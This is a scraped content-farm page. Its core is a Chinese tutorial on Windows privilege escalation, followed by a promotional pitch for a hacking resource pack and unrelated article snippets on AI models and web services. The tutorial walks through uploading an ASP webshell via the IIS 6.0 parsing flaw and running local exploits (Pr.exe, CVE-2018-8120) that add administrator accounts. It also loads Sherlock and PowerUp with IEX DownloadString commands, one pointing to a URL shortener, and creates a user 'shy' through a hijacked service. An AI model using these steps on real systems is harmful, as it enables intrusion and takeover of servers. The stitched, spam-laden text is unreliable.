十大免费ae模板网站桐梓网站建设

张小明 2026/1/14 16:25:31
十大免费ae模板网站,桐梓网站建设,网站建设计无形资产,公司网站设计很好的前言#xff1a; 了解基础知识之后#xff0c;这次就来仔细学一下Windows操作系统的提权。 Windows提权基础 0x00:Windows提权的大致方向 拿到一个低权限时要进行提权#xff0c;首先要清楚从哪里入手#xff0c;清楚了提权的大致方向#xff0c;才能事半功倍。 其中比…前言了解基础知识之后这次就来仔细学一下Windows操作系统的提权。Windows提权基础0x00:Windows提权的大致方向拿到一个低权限时要进行提权首先要清楚从哪里入手清楚了提权的大致方向才能事半功倍。其中比较常见而且利用较多的有内核提权数据库提权应用提权中间人劫持等01:Windows基础提权命令查询系统信息 systeminfo 如果要查看特定的信息可以使用 systeminfo | findstr /B /C:OS名称 /C:OS版本 主机名 Hostname 环境变量 Set 查看用户信息 Net user 查看服务pid号 Tasklist /svc|find TermService netstat -ano|find 3389 查看系统名 wmic os get caption 查看补丁信息 wmic qfe get Description,HotFixID,InstalledOn 如果要定位到特定的补丁可以使用如下命令 wmic qfe get Description,HotFixID,InstalledOn | findstr /C:KB4346084 /C:KB4509094 查看当前安装程序 wmic product get name,version其中需要注意一下环境变量因为有的软件环境变量可能设置在其它路径中而在该路径下的文件是具有写权限的就可以通过替换文件来达到提权操作02:常见所处的权限通常拿到webshell获得的权限如下ASP/PHP 匿名权限 ASPX user权限 jsp 通常是系统权限03:提权的前提条件最重要的就是收集信息了根据收集到的信息再进行响应的攻击。服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况收集好信息就可以先从这几个方面入手确定是否能执行命令如果不能调用系统cmd执行命令。 要上传一个cmd.exe 找一个可写可执行的目录 通过查找的补丁信息,找相应的exp提权04:溢出漏洞提权溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名缓冲区溢出漏洞 因为它是在程序执行的时候在缓冲区执行的错误代码所以叫缓冲区溢出漏洞。溢出漏洞提权是利用操作系统层漏洞进行权限提升通常步骤是拿到shell后获取目标机器的补丁信息通过目标的补丁情况获取相对应的漏洞进行提权Windows提权实践0x01:Pr提权Pr是windows本地溢出工具主要作用就是可以将低权限用户提升为系统权限主要用于webshell提权补丁号为KB952004虽然Pr提权已经很老了但对于新手去学习提权还是需要去学习一下的接下来就来实践一下Pr提权。一个上传页面使用Wappalyzer分析一下服务器是什么服务器以及网站环境等Web服务器是iis6.0存在中间件解析漏洞可以利用这个漏洞进行上传木马IIS6.0解析漏洞介绍 当建立*.asa、.asp格式的文件夹时其目录下的任意文件都将会被IIS当做asp解析。 当文件.asp;1.jpg IIS6.0同样会将文件作为asp文件解析。上传一个asp一句话木马改下目录和文件后缀上传成功连接成功获得webshell权限先来查看一下当前的用户权限发现菜刀的虚拟终端没办法使用自己上传一个当前的用户权限是并没有创建用户等权限所以接下来就要收集信息了先来查询一下系统信息在系统的补丁中发现没有KB952004因此可以利用这个漏洞进行提权cve-2009-0079上传pr.exe提权成功02:Windows分析工具的利用WinSystemHelperWinSystemHelper检查可利用的漏洞该工具适合在任何Windows服务器上进行已知提权漏洞的检测使用方法: 上传battxt文件运行bat查看结果WinSystemHelper实验环境windows server 2003创建一个iis服务并开启asp支持在wwwroot目录下放一个aspx木马菜刀进行连接连接成功后查看权限权限不高在其他文件夹中上传不了但可以在RECYCLER文件夹中上传文件因为一般情况下这个文件夹都是有权限进行上传的。RECYCLER是windows操作系统中存放被删除文件的文件夹之一根据WinSystemHelper的使用方法在该目录下上传battxt文件。虚拟终端运行一下WinSysHelper.bat有很多可以利用的漏洞找一个11年的exp测试一下直接运行发现成功添加了一个k8team的用户创建的用户已经成功添加到管理员组当中提权成功SherlockSherlock是一个在Windows下用于本地提权的PowerShell脚本https://github.com/rasta-mouse/Sherlock使用方法:本地加载脚本 Import-Module Sherlock.ps1 远程加载脚本 IEX (New-Object System.Net.Webclient).DownloadString(https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1) 检查漏洞 Find-AllVulns 出现Appears Vulnerable就是存在漏洞实验环境win7,搭配有phpstudy先用管理员账号创建一个普通的账号,用户名为test登陆进去在根目录下设置一个php一句话木马进行连接发现无法在虚拟终端执行命令而且自己上传进去的cmd.exe也无法使用这时可以使用另外一款工具phpspy将其中的2011.php文件上传到网站根目录并进行访问密码在源代码中有登陆之后在这里面便可以进行命令执行了接下来在C:/users/test目录下放入Sherlock文件接下来调用下Powershell,这里直接在win7本机做实验了所以使用如下命令powershell.exe -exec bypass启动成功下面本地加载下脚本检查下存在的漏洞Import-Module ./Sherlock.ps1 Find-AllVulns通过这样的分析便可以找到对应的漏洞利用相应的exp即可可以找MS14-058测试一下,上传与操作系统版本相同的exp提权成功Privesc该工具可以枚举出目标Windows系统中常见的Windows错误安全配置错误的安全配置将允许攻击者在目标系统中实现信息收集以及权限提升Privesc使用方法本地加载脚本 Import-Module .\Privesc.psm1 获取函数 Get-Command -Module Privesc 检测全部信息 Invoke-AllChecks 命令行下执行 powershell.exe -exec bypass -Command {Import-Module .\PowerUp.ps1;Invoke-AllChecks} 远程调用执行 powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://dwz.cn/2vkbfp);Invoke-AllChecks 添加用户 Install-ServiceBinary -ServiceName 服务名 -UserName user -Password password先进入Powershell加载脚本并获取函数检测全部信息除此之外可以将信息导入到文件中IEX (New-Object Net.WebClient).DownloadString(http://dwz.cn/2vkbfp);Invoke-AllChecks 1.txt添加一个shy用户密码为123456Install-ServiceBinary -ServiceName phpStudySrv -UserName shy -Password 123456执行成功03:提权实战在测试的网站中上传一个asp木马文件菜刀进行连接当前权限为没有创建用户等权限需要进行提权操作使用命令systeminfo查看一下系统信息当前的操作系统是winserver-2008查到CVE-2018-8120可以对该系统进行提权操作,就将exp文件上传上去但发现网站根目录和垃圾邮箱都无法上传进去但是经过测试后发现可以在User/All Users目录下进行上传exp文件提权成功创建用户成功网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》需要点击下方链接即可前往获取读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击1.成长路线图学习规划要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。2.网安入门到进阶视频教程很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程文末领取哈3.SRC黑客文档大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录SRC技术文籍黑客资料由于是敏感资源这里不能直接展示哦全套教程文末领取哈4.护网行动资料其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指5.黑客必读书单6.网络安全岗面试题合集当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

建站平台免费加盟群晖wordpress主题

GLM-4.5开源大模型:智能体开发的新时代引擎 【免费下载链接】GLM-4.5-Air-Base 项目地址: https://ai.gitcode.com/zai-org/GLM-4.5-Air-Base 在人工智能技术飞速发展的今天,智谱AI正式推出GLM-4.5系列开源大模型,这款专为智能体应用…

张小明 2026/1/11 14:01:57 网站建设

如何查询网站备案时间成都装修公司口碑最好的是哪家

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

张小明 2026/1/11 9:21:29 网站建设

常州模板建站代理软件开发具体工作内容

YOLOv8-Face人脸检测专用模型上线,适配安防GPU设备 在智能安防系统日益复杂的今天,一个看似简单却至关重要的问题始终困扰着工程师:如何在几十路高清视频流中,稳定、准确地捕捉到百米外一张模糊侧脸?传统通用目标检测模…

张小明 2026/1/11 14:14:03 网站建设

wordpress多门店商城贴心的网站优化公司

第一章:PHP图像识别性能优化的必要性 在现代Web应用中,图像识别技术被广泛应用于内容审核、智能搜索和用户行为分析等场景。尽管PHP并非传统意义上的高性能计算语言,但其在Web开发中的普及性使得越来越多项目选择在PHP环境中集成图像识别功能…

张小明 2026/1/14 7:27:58 网站建设

西安最好的网站建设公司色多多导入百媚导航

效率飙升 10 倍!最全 Claude Skill 市场发现:10,000 实用技能一键“白嫖”! 你是否还在感叹 Claude 强大却不知道如何发挥它的极限?最近发现的这个 Claude Skill 市场——SkillsMP,绝对是目前市面上最强的 Claude 资源…

张小明 2026/1/13 3:33:13 网站建设

在线购物网站建设流程流感吃什么药效果最好

lora-scripts支持消费级显卡:低成本进入AI训练新时代 在一张RTX 3090显卡上,用不到200张图片训练出专属的艺术风格模型;在一个下午的时间里,为客服系统定制出行业话术的轻量级大模型适配模块——这在过去需要专业团队和数万元预算…

张小明 2026/1/12 17:13:39 网站建设